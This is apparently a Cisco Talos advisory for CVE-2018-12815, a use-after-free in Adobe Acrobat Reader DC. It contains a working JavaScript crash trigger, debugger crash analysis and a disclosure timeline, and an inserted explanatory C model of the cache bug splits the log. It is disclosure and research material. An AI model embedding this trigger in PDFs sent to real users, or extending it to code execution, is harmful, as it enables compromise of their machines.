CVE-2018-12815
Specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when the document is opened in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Adobe Acrobat Reader DC 2018.011.20038
6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a large user base, is usually the default PDF reader on systems, and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.
Adobe Acrobat Reader DC supports JavaScript code embedded in the PDF to allow for interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout, and creates additional attack surface.
While executing the following piece of code, a cache misuse can lead to a dereference of a previously freed object, which can cause further memory corruption:
this.Net.Subscriptions.addUI({},[],'b');
this.spell.languages;
a = this.Collab.drivers;
this.SetRSSMethods('a',{});
JSON.stringify(a);
While executing the JSON.stringify() method on an indirect reference to the this.Collab.drivers object, an invalid pointer is retrieved, leading to a crash at the following address:
(100c.174c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=253b8ef8 ebx=00000000 ecx=5ef4a370 edx=5ef4a378 esi=1def2fc0 edi=6e866fb8
eip=5ebd7790 esp=001ac550 ebp=001ac570 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Annots!PlugInMain+0x7388f:
5ebd7790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????
Stepping back, we can see that the pointer in eax comes from the following function call:
0:000> u eip-14
Annots!PlugInMain+0x7387b:
5ebd777c 6870a3f45e push offset Annots!PlugInMain+0x3e646f (5ef4a370)
5ebd7781 ff7508 push dword ptr [ebp+8]
5ebd7784 ff90cc000000 call dword ptr [eax+0CCh]
0:000> da Annots!PlugInMain+0x3e646f
5ef4a370 "CRSSFeedUI"
This is an indirect call to the cachehash methods in EScript.api, referencing the CRSSFeedUI object, and a pointer to a freed object is returned:
0:000> !heap -p -a eax
address 253b8ef8 found in
_DPH_HEAP_ROOT @ 1b1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
252b14ac: 253b8000 2000
6b1e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
774969cc ntdll!RtlDebugFreeHeap+0x0000002f
77459e07 ntdll!RtlpFreeHeap+0x0000005d
774263a6 ntdll!RtlFreeHeap+0x00000142
7565c614 kernel32!HeapFree+0x00000014
6901ecfa MSVCR120!free+0x0000001a [f:\dd\vctools\crt\crtw32\heap\free.c @ 51]
610c524f EScript!PlugInMain+0x000026b0
610c5206 EScript!PlugInMain+0x00002667
61101c50 EScript!mozilla::HashBytes+0x000315da
610d388f EScript!mozilla::HashBytes+0x00003219
610d32f3 EScript!mozilla::HashBytes+0x00002c7d
611f5d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067
611f6342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d
611f5baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca
611f633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656
611f7140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b
611f518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9
610f75ce EScript!mozilla::HashBytes+0x00026f58
610f17da EScript!mozilla::HashBytes+0x00021164
610f0606 EScript!mozilla::HashBytes+0x0001ff90
610f0511 EScript!mozilla::HashBytes+0x0001fe9b
610f0458 EScript!mozilla::HashBytes+0x0001fde2
610d9e2e EScript!mozilla::HashBytes+0x000097b8
611185ec EScript!mozilla::HashBytes+0x00047f76
61118370 EScript!mozilla::HashBytes+0x00047cfa
61117de3 EScript!mozilla::HashBytes+0x0004776d
61116cd5 EScript!mozilla::HashBytes+0x0004665f
61186428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743
58e4ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d
58d8cb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce
58d8922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc
58bdefca AcroRd32!AX_PDXlateToHostEx+0x0015a229
If we examine the code immediately following the point of the crash, we can see the following:
0:000> u eip
Annots!PlugInMain+0x7388f:
5ebd7790 8b10 mov edx,dword ptr [eax]
5ebd7792 8d4df0 lea ecx,[ebp-10h]
5ebd7795 51 push ecx
5ebd7796 8bc8 mov ecx,eax
5ebd7798 ff5248 call dword ptr [edx+48h]
Since the freed memory region is quickly used in an indirect call instruction, having control over the contents of that region can lead to arbitrary code execution.
It should be noted that this issue is very similar in nature to TALOS-2018-0569.
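The cache-misuse pattern described above (a cache handing back a pointer to an already-freed object, which is then used for an indirect call), as an added model in C that is not part of this advisory and is not Adobe's code. It uses a static object pool, a name-keyed cache that is never told about frees (the vulnerable lookup), and a hardened lookup that records a per-object generation counter at insert time and evicts stale entries instead of returning them. All names (obj_alloc, obj_free, cache_put, cache_lookup_unsafe, cache_lookup_safe, scenario), the "driver" label and the teardown order are assumptions made for the model; only the "CRSSFeedUI" label comes from the advisory. The pool is static so the stale access stays well-defined C; on a real heap it would be the undefined behaviour seen in the crash.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Added model, not Adobe's code: a static object pool plus a name-keyed
 * cache, following the advisory's description of a cache handing back a
 * pointer to an already-freed "CRSSFeedUI" object. The pool is static so
 * every access below is well-defined C; on a real heap the stale
 * dereference would be undefined behaviour (the Reader crash). */

#define POOL_SIZE 4
#define CACHE_SIZE 8

typedef struct Obj {
    const char *name;            /* e.g. "CRSSFeedUI" */
    int alive;                   /* 0 once obj_free() has run */
    uint32_t generation;         /* bumped on every free; detects stale handles */
    int (*method)(struct Obj *); /* stands in for the vtable slot called at [edx+48h] */
} Obj;

typedef struct {
    const char *key;
    Obj *ptr;
    uint32_t generation;         /* generation seen when the entry was inserted */
} CacheEntry;

static Obj pool[POOL_SIZE];
static CacheEntry cache[CACHE_SIZE];
static int cache_count;

static int feed_method(Obj *o)   { (void)o; return 1; } /* "feed UI" behaviour */
static int driver_method(Obj *o) { (void)o; return 2; } /* unrelated object type (constructed) */

static void reset_state(void) {
    memset(pool, 0, sizeof pool);
    memset(cache, 0, sizeof cache);
    cache_count = 0;
}

Obj *obj_alloc(const char *name, int (*method)(Obj *)) {
    for (int i = 0; i < POOL_SIZE; i++) {
        if (!pool[i].alive) {           /* first free slot, like heap reuse */
            pool[i].name = name;
            pool[i].alive = 1;
            pool[i].method = method;
            return &pool[i];
        }
    }
    return NULL;
}

void obj_free(Obj *o) {
    o->alive = 0;
    o->generation++;    /* every handle taken before this point is now stale */
    o->method = NULL;
    /* The cache is not notified of this free: that omission is the bug. */
}

void cache_put(const char *key, Obj *o) {
    if (cache_count < CACHE_SIZE) {
        cache[cache_count].key = key;
        cache[cache_count].ptr = o;
        cache[cache_count].generation = o->generation;
        cache_count++;
    }
}

/* Vulnerable lookup: returns the cached pointer unconditionally. */
Obj *cache_lookup_unsafe(const char *key) {
    for (int i = 0; i < cache_count; i++)
        if (strcmp(cache[i].key, key) == 0)
            return cache[i].ptr;
    return NULL;
}

/* Hardened lookup: the pointer is only trusted while the object is alive
 * and its generation still matches what the cache recorded; otherwise the
 * stale entry is evicted and the caller gets NULL, not a dangling pointer. */
Obj *cache_lookup_safe(const char *key) {
    for (int i = 0; i < cache_count; i++) {
        if (strcmp(cache[i].key, key) != 0) continue;
        Obj *o = cache[i].ptr;
        if (o->alive && o->generation == cache[i].generation)
            return o;
        cache[i] = cache[--cache_count];  /* evict the stale entry */
        return NULL;
    }
    return NULL;
}

/* Replays the shape of the trigger: create the feed UI object, cache it,
 * free it, let an unrelated object reuse the slot, then call through the
 * cached pointer. Returns the method's result (2 means the reused slot's
 * method ran through a "CRSSFeedUI" lookup), or -1 when the hardened lookup
 * refused the stale entry. */
int scenario(int hardened) {
    reset_state();
    Obj *feed = obj_alloc("CRSSFeedUI", feed_method);
    cache_put("CRSSFeedUI", feed);
    obj_free(feed);
    Obj *driver = obj_alloc("driver", driver_method);  /* reuses the freed slot */
    (void)driver;
    Obj *o = hardened ? cache_lookup_safe("CRSSFeedUI")
                      : cache_lookup_unsafe("CRSSFeedUI");
    if (o == NULL) return -1;
    return o->method(o);  /* unsafe path: indirect call through reused memory */
}

int main(void) {
    printf("unsafe lookup result: %d (2 = reused slot's method invoked)\n", scenario(0));
    printf("safe   lookup result: %d (-1 = stale entry rejected)\n", scenario(1));
    return 0;
}
```

The generation check is the same idea as a weak handle: the cache never has to be told about frees, because a stale entry proves itself stale on the next lookup. Whether Adobe's actual fix took this form is not stated in the advisory; the model only shows why a cache of raw pointers that is not invalidated on free reproduces the crash pattern above.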
0:000> g
(17e0.153c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=253b8ef8 ebx=00000000 ecx=5f1ca370 edx=5f1ca378 esi=1dea2fc0 edi=6e66cfb8
eip=5ee57790 esp=0052c948 ebp=0052c968 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Annots!PlugInMain+0x7388f:
5ee57790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????
0:000> !heap -p -a eax
address 253b8ef8 found in
_DPH_HEAP_ROOT @ 61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
252b14ac: 253b8000 2000
66d590b2 verifier!AVrfDebugPageHeapFree+0x000000c2
774969cc ntdll!RtlDebugFreeHeap+0x0000002f
77459e07 ntdll!RtlpFreeHeap+0x0000005d
774263a6 ntdll!RtlFreeHeap+0x00000142
7565c614 kernel32!HeapFree+0x00000014
6901ecfa MSVCR120!free+0x0000001a [f:\dd\vctools\crt\crtw32\heap\free.c @ 51]
5f50524f EScript!PlugInMain+0x000026b0
5f505206 EScript!PlugInMain+0x00002667
5f541c50 EScript!mozilla::HashBytes+0x000315da
5f51388f EScript!mozilla::HashBytes+0x00003219
5f5132f3 EScript!mozilla::HashBytes+0x00002c7d
5f635d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067
5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d
5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca
5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656
5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b
5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9
5f5375ce EScript!mozilla::HashBytes+0x00026f58
5f5317da EScript!mozilla::HashBytes+0x00021164
5f530606 EScript!mozilla::HashBytes+0x0001ff90
5f530511 EScript!mozilla::HashBytes+0x0001fe9b
5f530458 EScript!mozilla::HashBytes+0x0001fde2
5f519e2e EScript!mozilla::HashBytes+0x000097b8
5f5585ec EScript!mozilla::HashBytes+0x00047f76
5f558370 EScript!mozilla::HashBytes+0x00047cfa
5f557de3 EScript!mozilla::HashBytes+0x0004776d
5f556cd5 EScript!mozilla::HashBytes+0x0004665f
5f5c6428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743
5a57ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d
5a4bcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce
5a4b922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc
5a30efca AcroRd32!AX_PDXlateToHostEx+0x0015a229
0:000> k
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0052c968 5f53d6ca Annots!PlugInMain+0x7388f
01 0052c9d8 5f541c50 EScript!mozilla::HashBytes+0x2d054
02 0052ca08 5f51388f EScript!mozilla::HashBytes+0x315da
03 0052ca98 5f5132f3 EScript!mozilla::HashBytes+0x3219
04 0052cab4 5f635d4c EScript!mozilla::HashBytes+0x2c7d
05 0052cb74 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf067
06 0052cc08 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf65d
07 0052cc54 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xceeca
08 0052cce8 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf656
09 0052ce8c 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xd045b
0a 0052cf28 5f5375ce EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xce4a9
0b 0052cf9c 5f5317da EScript!mozilla::HashBytes+0x26f58
0:000> u
Annots!PlugInMain+0x7388f:
5ee57790 8b10 mov edx,dword ptr [eax]
5ee57792 8d4df0 lea ecx,[ebp-10h]
5ee57795 51 push ecx
5ee57796 8bc8 mov ecx,eax
5ee57798 ff5248 call dword ptr [edx+48h]
5ee5779b 8365fc00 and dword ptr [ebp-4],0
5ee5779f 8bc8 mov ecx,eax
5ee577a1 8b35000d2c5f mov esi,dword ptr [Annots!PlugInMain+0x4dcdff (5f2c0d00)]
2018-05-08 - Vendor Disclosure
2018-07-10 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.